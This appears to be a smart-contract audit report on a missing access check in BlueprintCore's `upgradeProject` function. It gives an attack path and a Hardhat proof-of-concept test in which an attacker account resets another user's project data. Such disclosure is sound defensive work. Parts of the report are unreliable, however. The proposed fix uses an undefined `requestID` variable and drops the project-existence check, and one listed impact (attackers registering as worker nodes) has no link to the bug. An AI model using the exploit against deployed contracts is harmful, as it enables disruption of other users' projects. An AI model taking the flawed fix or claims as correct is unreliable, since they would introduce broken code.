Feisty Pickle Liger

High

# Unauthorized Users Can Reset Any Project's State Due to Missing Access Controls in upgradeProject Function

### Summary

Lack of access control in the `upgradeProject` function allows any user to reset the state of any project in the system, which could lead to unauthorized state changes, data loss, and potential service disruption in the `BlueprinCore.sol` contract.

### Root Cause

The `upgradeProject` function in particular lacks proper authorization checks, allowing any address to call it and reset critical project data.

[crestal-omni-contracts/src/BlueprintCore.sol:upgradeProject#L198-L203](https://github.com/sherlock-audit/2025-03-crestal-network/blob/27a3c28155702b3a68f29347efedffb048010e33/crestal-omni-contracts/src/BlueprintCore.sol#L198C1-L203C6)
```solidity
function upgradeProject(bytes32 projectId) public hasProject(projectId) {
    // reset project info
    projects[projectId].requestProposalID = 0; // Should be bytes32(0)
    projects[projectId].requestDeploymentID = 0; // Should be bytes32(0)
    projects[projectId].proposedSolverAddr = dummyAddress;
}
```

### Internal Pre-conditions

The `projects` mapping must contain active projects with valid data

### External Pre-conditions

Valid `projectId` exists in the system

### Attack Path

An attacker could exploit the `upgradeProject` vulnerability through the following steps:

1. Identify active projects in the system by monitoring events or querying the contract
2. Call the `upgradeProject` function with a valid `projectId`
3. The function will reset critical project data without checking if the caller is authorized
4. The project's proposal and deployment IDs will be reset to invalid values (0 instead of bytes32(0))
5. The project's solver address will be reset to the dummy address

### Impact

The successful exploitation of these vulnerabilities could result in:

1. **Service Disruption**: Projects being reset could break the functionality of deployed agents
2. **Data Loss**: Historical deployment records becoming inaccessible
3. **Unauthorized Access**: Malicious actors registering as worker nodes

### PoC

This PoC demonstrates that:

1. A legitimate project can be created and set up with valid data
2. An attacker who is not the project owner can call the `upgradeProject` function
3. The function executes without any authorization checks
4. The project's critical data (proposal ID, deployment ID, solver address) is reset
5. This effectively disrupts the project's functionality

The vulnerability exists because the `upgradeProject` function only checks if the project exists (via the `hasProject` modifier) but does not verify if the caller is authorized to modify the project.

<details><summary>POC</summary>

```javascript
const { expect } = require("chai");
const { ethers } = require("hardhat");

describe("BlueprintCore Vulnerability PoC", function () {
  let blueprintCore;
  let owner;
  let projectOwner;
  let attacker;
  let validProjectId;

  before(async function () {
    // Deploy the contract
    const BlueprintCore = await ethers.getContractFactory("BlueprintCore");
    [owner, projectOwner, attacker] = await ethers.getSigners();
    
    blueprintCore = await BlueprintCore.deploy();
    await blueprintCore.deployed();
    
    // Create a project as the legitimate project owner
    const tx = await blueprintCore.connect(projectOwner).createProjectID(
      "Test Project",
      { from: projectOwner.address }
    );
    
    // Get the project ID from the event
    const receipt = await tx.wait();
    const event = receipt.events.find(e => e.event === 'ProjectCreated');
    validProjectId = event.args.projectId;
    
    console.log(`Project created with ID: ${validProjectId}`);
    
    // Set up the project with some data
    await blueprintCore.connect(projectOwner).createDeploymentRequest(
      ethers.constants.AddressZero, // token address
      validProjectId,
      "base64EncodedProposal",
      "https://example.com",
      { from: projectOwner.address }
    );
  });

  it("Should allow unauthorized reset of project data", async function () {
    // Step 1: Verify the project exists and get its current state
    const projectBefore = await blueprintCore.getProjectInfo(validProjectId);
    console.log("Project before attack:");
    console.log("- Solver Address:", projectBefore[0]);
    console.log("- Proposal ID:", projectBefore[1]);
    console.log("- Deployment IDs:", projectBefore[2]);
    
    // Verify the project has valid data
    expect(projectBefore[1]).to.not.equal(ethers.constants.HashZero);
    
    // Step 2: Call upgradeProject as the attacker (not the project owner)
    console.log("\nExecuting attack as:", attacker.address);
    await blueprintCore.connect(attacker).upgradeProject(validProjectId);
    console.log("Attack executed: Project data reset by unauthorized user");
    
    // Step 3: Verify the project state has been reset
    const projectAfter = await blueprintCore.getProjectInfo(validProjectId);
    console.log("\nProject after attack:");
    console.log("- Solver Address:", projectAfter[0]);
    console.log("- Proposal ID:", projectAfter[1]);
    console.log("- Deployment IDs:", projectAfter[2]);
    
    // Verify the data has been reset
    expect(projectAfter[1]).to.equal(ethers.constants.HashZero);
    expect(projectAfter[0]).to.equal(await blueprintCore.dummyAddress());
    
    console.log("\nVulnerability confirmed: Attacker successfully reset project data without authorization");
  });
});
```

</details>

### Mitigation

It is recommended to add proper access control to `upgradeProject`. And conduct a comprehensive security audit to review all access control mechanisms, verify type safety throughout the contract and ensure business logic consistency.

```solidity
function upgradeProject(bytes32 projectId) public {
+   require(deploymentOwners[requestID] == msg.sender || isAdmin(msg.sender), "Not authorized");
    
    projects[projectId].requestProposalID = bytes32(0);
    projects[projectId].requestDeploymentID = bytes32(0);
    projects[projectId].proposedSolverAddr = dummyAddress;
    
    emit ProjectUpgraded(projectId, msg.sender);
}
```